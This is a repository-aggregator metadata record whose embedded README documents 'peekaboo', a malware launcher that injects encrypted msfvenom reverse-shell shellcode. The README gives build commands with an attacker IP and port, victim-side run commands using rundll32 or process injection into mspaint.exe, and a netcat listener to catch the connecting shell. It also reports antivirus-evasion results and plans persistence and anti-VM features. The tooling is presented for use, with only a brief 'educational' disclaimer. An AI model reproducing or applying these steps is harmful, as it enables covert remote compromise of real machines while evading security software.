{"id":17383477,"url":"https://github.com/cocomelonc/peekaboo","last_synced_at":"2025-04-12T22:27:17.205Z","repository":{"id":37268887,"uuid":"388198122","full_name":"cocomelonc/peekaboo","owner":"cocomelonc","description":"Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.","archived":false,"fork":false,"pushed_at":"2024-10-24T07:56:20.000Z","size":4577,"stargazers_count":241,"open_issues_count":0,"forks_count":41,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-04-04T01:36:08.351Z","etag":null,"topics":["aes","cpp","cryptography","encryption","injection","injector","malware-development","obfuscation","pe-files","shellcode","xor"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cocomelonc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-21T17:37:41.000Z","updated_at":"2025-03-17T02:42:30.000Z","dependencies_parsed_at":"2025-01-01T10:02:28.462Z","dependency_job_id":"db1ea0ee-b512-42cd-8405-b58601586ac8","html_url":"https://github.com/cocomelonc/peekaboo","commit_stats":{"total_commits":50,"total_committers":2,"mean_commits":25.0,"dds":"0.040000000000000036","last_synced_commit":"c3a990c59bf16fb508f782b7df6780c59eccafc8"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fpeekaboo","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fpeekaboo/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fpeekaboo/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cocomelonc%2Fpeekaboo/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cocomelonc","download_url":"https://codeload.github.com/cocomelonc/peekaboo/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248639128,"owners_count":21137781,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aes","cpp","cryptography","encryption","injection","injector","malware-development","obfuscation","pe-files","shellcode","xor"],"created_at":"2024-10-16T07:42:54.787Z","updated_at":"2025-04-12T22:27:17.170Z","avatar_url":"https://github.com/cocomelonc.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Peekaboo\n\nSimple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.\n\n## Main logic\n\nXOR encryption and decryption for functions call and main payload - `msfvenom` reverse shell as example.\n\n## Usage\n## 1. DLL\n### on attacker machine\n\ncheck your IP:\n```bash\nip a\n```\n\n![attacker machine IP](./screenshots/2022-04-24_13-05.png?raw=true)\n\nrun python script with flags:\n```bash\npython3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1\n```\n\n![run python script](./screenshots/2022-04-24_13-08.png?raw=true)\n\n### then on victim machine (windows 10 x64):\nrun on powershell or cmd promt:\n```cmd\nrundll32 .\\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy\n```\n\n![run on victim machine](./screenshots/2022-04-24_13-11.png?raw=true)\n\n### check on attacker machine:\ncheck your netcat listener:\n\n![check netcat listener](./screenshots/2022-04-24_13-12.png?raw=true)\n\n![check IP address](./screenshots/2022-04-24_13-13.png?raw=true)\n\n## 2.Injector\n### on attacker machine:\ncheck attacker ip:\n```bash\nip a\n```\n\n![check IP](./screenshots/2022-04-24_13-05.png?raw=true)\n\nrun python script on linux (for example process `mspaint.exe`):\n```bash\npython3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2\n```\n\n![run python script](./screenshots/2022-04-24_13-18.png?raw=true)\n\n### then on victim machine run (windows 10 x64):\n```cmd\n.\\peekaboo.exe\n```\n\nor click (if `-m windows` param)\n\n![run on victim machine](./screenshots/2022-04-24_13-20.png?raw=true)\n\n### check on attacker machine:\ncheck your netcat listener:\n\n![check netcat listener](./screenshots/2022-04-24_13-22.png?raw=true)\n\n## 3. NT API injector\nrun python script on linux (for example process `mspaint.exe`):\n```bash\npython3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3\n```\n\n![enc and compile nt](./screenshots/2022-04-24_13-25.png?raw=true)\n\n### then on victim machine (windows 10 x64):\n```cmd\n.\\peekaboo.exe\n```\n\n![run malware](./screenshots/2022-04-24_13-27.png?raw=true)    \n\n![run malware](./screenshots/2022-04-24_13-29.png?raw=true)\n\n## Issues.\nTested on:\n1. Attacker machines: Kali linux 2020.1, Windows 10 x64\n2. Victim machine: Windows 7 x64, Windows 10 x64\n3. Payload: windows x64 reverse shell from msfvenom\n4. AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus\n\n## virus total result:\n02 september 2021\n\n![virustotal](./screenshots/11.png?raw=true)\n\n[https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection](https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection)\n\n30 december 2021 (NT API injector)    \n\n![virtustotal 2](./screenshots/16.png?raw=true)    \n\n[https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection](https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection)    \n\n## antiscan.me result:\n\n11 january 2022 (NT API injector)    \n\n![antiscan](./screenshots/antiscan.png?raw=true)    \n\n[https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9](https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9)    \n\n## websec.nl scanner result:\n\n10 October 2024     \n\n![websec](./screenshots/websec.png?raw=true)     \n\n[https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9](https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9)     \n\n## TODO\n- [x] Compile injector in Kali linux\n- [x] XOR + AES [aes branch](https://github.com/cocomelonc/peekaboo/tree/aes)\n- [x] Calling Windows API functions by hash names\n- [x] Find Kernel32 base via asm style\n- [x] One python builder\n- [ ] Anti-VM tricks\n- [ ] Persistence via Windows Registry run keys\n- [ ] Replace msfvenom shell to donut payload???\n\n## Attention\nThis tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause\n\n## License\n[MIT](https://choosealicense.com/licenses/mit/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fpeekaboo","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcocomelonc%2Fpeekaboo","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcocomelonc%2Fpeekaboo/lists"}